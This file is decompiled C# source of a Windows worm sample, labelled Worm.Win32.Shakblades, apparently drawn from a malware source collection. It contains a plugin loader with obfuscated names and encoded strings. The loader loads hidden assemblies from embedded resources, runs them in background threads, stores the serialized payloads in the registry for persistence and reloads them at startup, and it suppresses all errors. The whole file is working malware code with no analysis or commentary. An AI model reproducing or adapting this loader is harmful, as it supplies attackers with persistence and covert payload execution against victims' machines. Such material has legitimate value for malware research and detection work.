MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ᙐᗡѬᵲ૦ᵛଔѥቾ.cs

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᙐᗡѬᵲ૦ᵛଔѥቾ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe

using Microsoft.Win32;
using Plugin;
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.Serialization.Formatters.Binary;
using System.Threading;

namespace Ҧ߲๒ʽ໙ୄᴘ
{
  public class ᙐᗡѬᵲ૦ᵛଔѥቾ
  {
    public static SortedList<Guid, byte[]> \u0382Ⴊ\u19CD\u0DF1в = new SortedList<Guid, byte[]>();
    public static SortedList<Guid, IPlugin> රᓙ = new SortedList<Guid, IPlugin>();
    private static string \u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;

    public static event ᙐᗡѬᵲ૦ᵛଔѥቾ.ᘕঃ \u0C11\u0FBFᵥރតൃĚŹᗐ;

    public static void ᇎ()
    {
      try
      {
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        MemoryStream serializationStream = new MemoryStream();
        binaryFormatter.Serialize((Stream) serializationStream, (object) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в);
        serializationStream.Close();
        byte[] numArray = \u1928ᔾዔ.ᅀძṶၠ(serializationStream.ToArray(), false);
        if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
          Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray);
        else
          Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray);
      }
      catch
      {
      }
    }

    public static void ʉᆖͧ\u05CB\u00A9ᤤդܛ() => new Thread((ThreadStart) (() =>
    {
      try
      {
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        MemoryStream memoryStream;
        byte[] numArray1;
        if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
        {
          MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false));
          ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
          serializationStream.Close();
          serializationStream.Dispose();
          memoryStream = (MemoryStream) null;
          numArray1 = (byte[]) null;
        }
        else
        {
          MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false));
          ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
          serializationStream.Close();
          serializationStream.Dispose();
          memoryStream = (MemoryStream) null;
          numArray1 = (byte[]) null;
        }
        foreach (byte[] numArray2 in (IEnumerable<byte[]>) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Values)
          ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray2);
      }
      catch
      {
      }
    })).Start();

    public static void dz() => new Thread((ThreadStart) (() =>
    {
      try
      {
        if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0)
          return;
        ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly());
        int num = (int) resourceManager.GetObject("Len");
        for (int index = 0; index < num; ++index)
        {
          byte[] numArray = (byte[]) resourceManager.GetObject(index.ToString());
          Array.Reverse((Array) numArray);
          ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray);
        }
        if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ)
          return;
        ᙐᗡѬᵲ૦ᵛଔѥቾ.ᇎ();
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
      }
    })).Start();

    public static bool ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(byte[] _param0)
    {
      try
      {
        foreach (Type type in Assembly.Load(_param0).GetTypes())
        {
          int num = 0;
          if (type.IsClass && type.IsSubclassOf(typeof (IPlugin)))
          {
            IPlugin instance = (IPlugin) Activator.CreateInstance(type);
            if (instance.ExecuteOnLoad)
            {
              instance.Initialize();
              ᙐᗡѬᵲ૦ᵛଔѥቾ.ᄄĐἮᥪ᭫ᘙȃই((object) null, instance, instance.ExecuteOnLoadArgs);
            }
            if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.ContainsKey(instance.Guid))
              ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Add(instance.Guid, _param0);
            else
              ++num;
            if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(instance.Guid))
              ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(instance.Guid, instance);
            else
              ++num;
            ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
            if (num == 2)
            {
              ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = instance.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
              return false;
            }
            if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
              ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, instance);
            return true;
          }
        }
        ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("dp+UpqZTqpynm1N8g5+ompyhUzOdE72coaeYpZmUlphToaKnU5miqKGXYQ==", true);
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
        ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = ex.Message;
      }
      return false;
    }

    public static bool ᓒኞᣆќᆈࡏಒ\u0B76ୁ(IPlugin _param0)
    {
      if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0.Guid))
      {
        ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(_param0.Guid, _param0);
        ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
        if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
          ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, _param0);
        return true;
      }
      ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = _param0.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
      return false;
    }

    public static void \u136Eᐰ\u1CAA\u0EE1ள(Guid _param0)
    {
      if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0))
        return;
      ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Remove(_param0);
      ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Remove(_param0);
    }

    public static string \u0CC0() => ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ;

    public static void ᄄĐἮᥪ᭫ᘙȃই(object ඳ, IPlugin _param1, PluginArgs _param2) => new Thread((ThreadStart) (() =>
    {
      try
      {
        _param1.Execute(ඳ, _param2);
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
      }
    })).Start();

    public static void ፂ\u0ECFȐفᅵټ༵୩()
    {
      try
      {
        if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ)
          return;
        if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
          Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A);
        else
          Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A);
      }
      catch
      {
      }
    }

    public delegate void ᘕঃ(object sender, IPlugin plugin);
  }
}